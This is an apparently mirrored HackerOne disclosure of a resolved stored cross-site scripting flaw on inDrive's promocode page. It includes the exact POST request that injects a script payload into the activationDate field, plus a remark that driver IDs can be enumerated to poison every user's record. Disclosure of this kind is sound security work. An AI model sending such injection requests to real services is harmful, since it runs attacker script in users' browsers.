Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Stored XSS on promo.indrive.com

Medium
I
inDrive
Submitted None
Actions:
View on HackerOne
Reported by kristoferent

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
## Summary: The functionality on https://promo.indrive.com/promocodes allows drivers to find and activate promocodes. It requires a driver ID. When user activates their promocode, the browser makes a POST request to https://id.indrive.com/api/spreadsheet/promocodes with parameters **id** (driver id) and **activationDate** (the date of the promocode activation). It is possible for an attacker to set parameter **activationDate** value to an XSS payload. When a user inputs the same ID when looking for promocodes, the XSS payload will trigger, executing arbitrary JavaScript code in the victims's browser. ## Steps To Reproduce: 1. Make a POST request to https://id.indrive.com/api/spreadsheet/promocodes with the following body: ``` {"id":"4","activationDate":"<script>alert(1)</script>"} ``` {F2470829} The driver ID value of **4** is used, but the attacker can enumerate through valid driver IDs to inject the payload into every user's promocode. 2. Go to https://promo.indrive.com/promocodes 3. Input a driver ID (in my example **4**) and click "Проверить ID". The XSS payload will be triggered {F2470832} ## Supporting Material/References: Full POST Request: ``` POST /api/spreadsheet/promocodes HTTP/1.1 Host: id.indrive.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json Content-Length: 55 Origin: https://promo.indrive.com Referer: https://promo.indrive.com/ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Te: trailers Connection: close {"id":"4","activationDate":"<script>alert(1)</script>"} ``` ## Impact This vulnerability allows an attacker to execute arbitrary JavaScript code in any user's browser. Despite this being a retired functionality, an attacker could trick users to try and get a promocode. This could also potentially make promocodes usable infinite amount of times by directly making POST requests to renew the code every 24 hours.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$284.00

Submitted

Weakness

Cross-site Scripting (XSS) - Stored